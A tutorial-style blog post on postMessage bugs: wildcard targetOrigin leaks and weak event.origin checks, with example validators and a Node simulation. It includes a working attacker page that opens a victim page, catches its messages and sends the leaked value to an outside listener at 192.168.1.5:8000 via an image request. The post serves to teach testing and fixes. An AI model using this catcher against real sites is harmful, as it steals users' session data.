Hey fam, I hope everyone is doing okay and able to use this time efficiently for self-development and self-reflection. This coronavirus pandemic has grown a bit tiring, to be honest, and gets the best of us.

Here is my attempt at helping you understand a bug that is often overlooked when testing web apps or mobile apps, which makes it a gold mine for all testers, seasoned or new.

Prerequisite: the target site relies on cookies for its session, so a page the attacker opens in the victim's browser runs with the victim already logged in and whatever it posts is the victim's data.

CASE 1: Message sent to all origins

First, a little about postMessage. As described in the MDN documentation, the syntax is fairly simple: it is called on the window you want to send to, and the second argument names the origin that is allowed to receive the message.

targetWindow.postMessage(message, targetOrigin, [transfer]);

The problem arises when targetOrigin is set to * (any origin): the browser then hands the message to whatever window it is addressed to, no matter who controls that window. A related mistake happens on the receiving side, where the listener is supposed to check event.origin against, say, xyz.com but does so with a substring or unanchored regex match, so an attacker who registers a domain like xyz.computer.com (which contains the string xyz.com) passes the check. Note that the browser enforces the targetOrigin argument itself exactly, so a lookalike domain does not defeat a correctly specified targetOrigin; the bypass lives in hand-written origin checks. Either way, as most of you must have guessed by now, the data is no longer restricted to the same origin (the original domain) and can be leaked.
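To make the receiving-side mistake concrete, here is an added example (not code from the original post) that puts a substring check and an unanchored regex check side by side with a strict equality check, using the placeholder trusted origin https://xyz.com from the text. The candidate origins are constructed for illustration; the listener shape {origin, source, data} is the one browsers deliver.

```javascript
// Added example: receiver-side origin validation for postMessage listeners.
// TRUSTED_ORIGIN is a placeholder standing in for the real site (assumption).
const TRUSTED_ORIGIN = "https://xyz.com";

// Weak check, commonly seen in the wild: substring match on event.origin.
// Passes for https://xyz.com, but also for https://xyz.computer.com,
// https://xyz.com.attacker.example and plain-HTTP http://xyz.com.
function weakOriginCheck(origin) {
  return origin.indexOf("xyz.com") !== -1;
}

// Another weak pattern: an unanchored regex whose "." is not escaped,
// so it matches any character (e.g. the origin https://xyzacom).
function weakRegexCheck(origin) {
  return /xyz.com/.test(origin);
}

// Strict check: compare the whole origin, scheme and host included.
function strictOriginCheck(origin) {
  return origin === TRUSTED_ORIGIN;
}

// A listener built on the strict check. `sink` receives only data from the
// trusted origin; everything else is dropped before it is touched.
function makeListener(sink) {
  return function onMessage(event) {
    if (!strictOriginCheck(event.origin)) return;
    sink(event.data);
  };
}

// Run one candidate origin through all three checks.
function evaluate(origin) {
  return {
    weak: weakOriginCheck(origin),
    regex: weakRegexCheck(origin),
    strict: strictOriginCheck(origin),
  };
}

// Constructed candidate origins an attacker could register or already owns.
const CANDIDATES = [
  "https://xyz.com",
  "https://xyz.computer.com",
  "https://xyz.com.attacker.example",
  "http://xyz.com",
  "https://xyzacom",
];

for (const origin of CANDIDATES) {
  console.log(origin, evaluate(origin));
}
```

Only the first candidate should pass strictOriginCheck; every other one passes at least one of the weak checks. When reviewing a listener, look for indexOf, includes, startsWith, endsWith, or a regex on event.origin; an exact comparison against a fixed allow-list is the only form that does not need further thought.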

Let's take a closer look at how this can be achieved.

<script>
// Attacker-controlled page. Any message delivered to this window is caught
// and its "value" field is sent to a listener the attacker runs.
window.addEventListener("message", function (event) {
  // Deliberately no check on event.origin: we want everything that arrives.
  // Assumes the leaking page posts an object with a "value" property.
  document.write("<img src='http://192.168.1.5:8000/?leak=" + encodeURIComponent(event.data.value) + "'>");
}, false);
// Open the vulnerable page so that this window becomes its window.opener,
// the window it posts its data to with targetOrigin "*".
window.open("vulnerable page leaking data"); // replace with the leaking page's URL
</script>

I know this must look confusing at first, but stay with me:

Since the message is sent to all origins, we should be able to catch it. So we created a malicious HTML page with an event listener, basically a catcher that receives any data delivered to our window by postMessage. The window.open call is what puts us in position: the vulnerable page we open sees our page as its window.opener, and because it posts with targetOrigin "*", the browser delivers the message to us even though our page is on a completely different origin. The same trick works with an iframe if the vulnerable page posts to its parent and is not protected by X-Frame-Options or frame-ancestors.
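The whole exchange, as an added example that is not part of the original post: a small Node simulation of two windows in which postMessage follows the one browser rule that matters here (a message is delivered only if targetOrigin is "*" or equals the receiving window's origin; this modelling of the browser is an assumption of the example, matching the HTML spec). The origins, the session token and the leak URL are constructed placeholders; the attacker's listener is the one from the post, with the leak URL built in a function so that it can be checked.

```javascript
// Added example: simulate the opener/child relationship and the targetOrigin rule.
class FakeWindow {
  constructor(origin) {
    this.origin = origin;     // e.g. "https://xyz.com"
    this.listeners = [];
    this.opener = null;       // set when this window was created via open()
  }

  addEventListener(type, fn) {
    if (type === "message") this.listeners.push(fn);
  }

  // Deliver `data` to this window's listeners if the browser would.
  // `from` is the sending window, used to fill event.origin.
  postMessage(data, targetOrigin, from) {
    if (targetOrigin !== "*" && targetOrigin !== this.origin) {
      return false;           // silently dropped, as in a real browser
    }
    for (const fn of this.listeners) {
      fn({ data, origin: from.origin, source: from });
    }
    return true;
  }

  // window.open(): create the child window and make this window its opener.
  open(childOrigin) {
    const child = new FakeWindow(childOrigin);
    child.opener = this;
    return child;
  }
}

// The vulnerable page: hands a session value to whoever opened it.
// `targetOrigin` is the value the developer wrote into the postMessage call.
function vulnerablePage(win, targetOrigin) {
  const secret = "sess-0123456789abcdef";   // constructed sample token
  if (win.opener) {
    win.opener.postMessage({ value: secret }, targetOrigin, win);
  }
}

// The attacker page from the post. Returns the leak URL that would be loaded
// as an <img>, or null if nothing was delivered to the attacker's window.
function runAttack(targetOrigin) {
  const attacker = new FakeWindow("https://attacker.example");
  let leaked = null;
  attacker.addEventListener("message", (event) => {
    leaked = "http://192.168.1.5:8000/?leak=" + encodeURIComponent(event.data.value);
  });
  const victim = attacker.open("https://xyz.com");   // window.open(...)
  vulnerablePage(victim, targetOrigin);
  return leaked;
}

console.log('targetOrigin "*":', runAttack("*"));
console.log('targetOrigin "https://xyz.com":', runAttack("https://xyz.com"));
```

With targetOrigin "*" the attacker's listener fires and the token ends up in the leak URL; with an explicit targetOrigin of the site's own origin nothing is delivered, which is exactly the fix for the sending side. The receiving side still needs the strict event.origin check from the previous example, because a page that accepts messages from "*" is the mirror image of this bug.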


How to spot and exploit postMessage vulnerabilities?